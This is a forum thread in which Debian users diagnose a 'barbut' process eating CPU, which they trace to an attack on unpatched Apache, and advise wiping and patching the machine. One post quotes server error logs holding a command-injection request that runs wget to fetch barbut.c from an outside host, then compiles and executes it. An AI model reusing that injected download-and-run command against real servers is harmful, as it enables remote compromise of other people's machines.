barbut process

[charliema]

I noticed my debian sid host was pegged at 100% CPU util. The guilty process was called 'barbut' by user 'guest'. I did a quick search and couldn't find any executables by that name (can't be sure the search is exhaustive). While that process was running I cannot reach the host via network (ssh or anything else). I've turned the machine off for now.
Anyone know what barbut is?

thanks,
charlie

[Marble_X]

I just recieved this in my error log yesterday:

Code:

[Tue Nov 20 07:57:01 2007] [error] [client 84.234.110.86] Invalid URI in request GET rm -f barbut barbut.c HTTP/1.1
[client 84.234.110.86] script '/WWW/index.php' not found or unable to stat
[Tue Nov 20 07:57:04 2007] [error] [client 84.234.110.86] Directory index forbidden by rule: /WWW/
[Tue Nov 20 07:57:05 2007] [error] [client 84.234.110.86] Invalid URI in request GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1
[Tue Nov 20 07:57:05 2007] [error] [client 84.234.110.86] Invalid URI in request GET arbut ;rm -f barbut barbut.c HTTP/1.1
[Tue Nov 20 07:57:06 2007] [error] [client 84.234.110.86] File does not exist: /WWW/mambo
[client 84.234.110.86] script '/WWW/index2.php' not found or unable to stat
[Tue Nov 20 07:57:16 2007] [error] [client 84.234.110.86] Invalid URI in request GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut  HTTP/1.1
[Tue Nov 20 07:57:17 2007] [error] [client 84.234.110.86] Invalid URI in request GET ;rm -f barbut barbut.c HTTP/1.1

---
It looks like a takeover of a machine that is already infected with barbut.
Ironically it also looks like it holds the key to cleaning your machine with a single http get.
But what you should really do, if you still have this infected machine after 4 weeks (unlikely), is have a look at your /tmp folder. you might find interesting stuff.

[dkhill]

Hi there... I've been getting infected with this since the middle of this month. It's a nasty bugger. Turns out that I had an unpatched version of Apache running that allowed an attacker to upload and compile a program called barbut.c. I did a "files | grep "barbut" and found the files. There were two in the /root directory of my debian box. I've turned off my apache server and anything else that could be talking on the Internet Adpater to the world. I've renamed these files. If you are interested in the source code of this barbut.c file, contact me off line. But for now, I am rearing to see if this addressed the problem.

[jledhead]

I would say it sounds like a rootkit/trojan
I found this barbut process using 100% cpu and connecting - Virus & Spyware

if it were me, I would wipe the box. if there is anything you need off it I would take it offline (no network access) and copy files to a usb drive, then wipe the machine. install an updated os and keep it up to date, and maybe even sign up for debian security mailing list so you know when there is an update that affects you.